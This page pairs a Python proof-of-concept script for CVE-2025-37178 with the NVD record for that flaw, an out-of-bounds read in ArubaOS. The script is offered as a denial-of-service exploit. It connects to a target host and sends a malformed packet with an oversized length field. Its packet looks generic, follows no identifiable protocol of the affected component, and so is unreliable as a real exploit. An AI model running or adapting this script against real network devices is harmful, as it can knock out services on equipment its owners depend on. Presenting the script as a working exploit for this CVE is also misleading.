CVE-2025-37178

# CVE-2025-37178 PoC - Out-of-Bounds Read # Target: HPE System Component # Type: Denial of Service via OOB Read import socket import struct import sys def create_exploit_packet(): """Construct malicious packet to trigger OOB read""" # Malformed header with oversized buffer length packet = b'\x00' * 8 # Header # Malicious buffer size field (exceeds actual buffer) oversized_length = struct.pack('<I', 0xFFFFFFFF) # Max uint32 packet += oversized_length # Additional trigger data packet += b'\x41' * 256 # Padding to trigger read return packet def exploit(target_ip, target_port=8080): """Send exploit packet to trigger vulnerability""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) print(f"[*] Sending exploit payload to {target_ip}:{target_port}") sock.send(create_exploit_packet()) print("[*] Packet sent. Check for process crash or error logs.") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080 exploit(target, port)

{"cve": {"id": "CVE-2025-37178", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.983", "lastModified": "2026-01-23T16:06:12.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple out-of-bounds read vulnerabilities were identified in a system component responsible for handling certain data buffers. Due to insufficient validation of maximum buffer size values, the process may attempt to read beyond the intended memory region. Under specific conditions, this can result in a crash of the affected process and a potential denial-of-service of the compromised process."}, {"lang": "es", "value": "Múltiples vulnerabilidades de lectura fuera de límites fueron identificadas en un componente del sistema responsable de manejar ciertos búferes de datos. Debido a una validación insuficiente de los valores de tamaño máximo del búfer, el proceso puede intentar leer más allá de la región de memoria prevista. Bajo condiciones específicas, esto puede resultar en una caída del proceso afectado y una potencial denegación de servicio del proceso comprometido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "28EE6221-D715-48C4-B181-BD530080E706"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}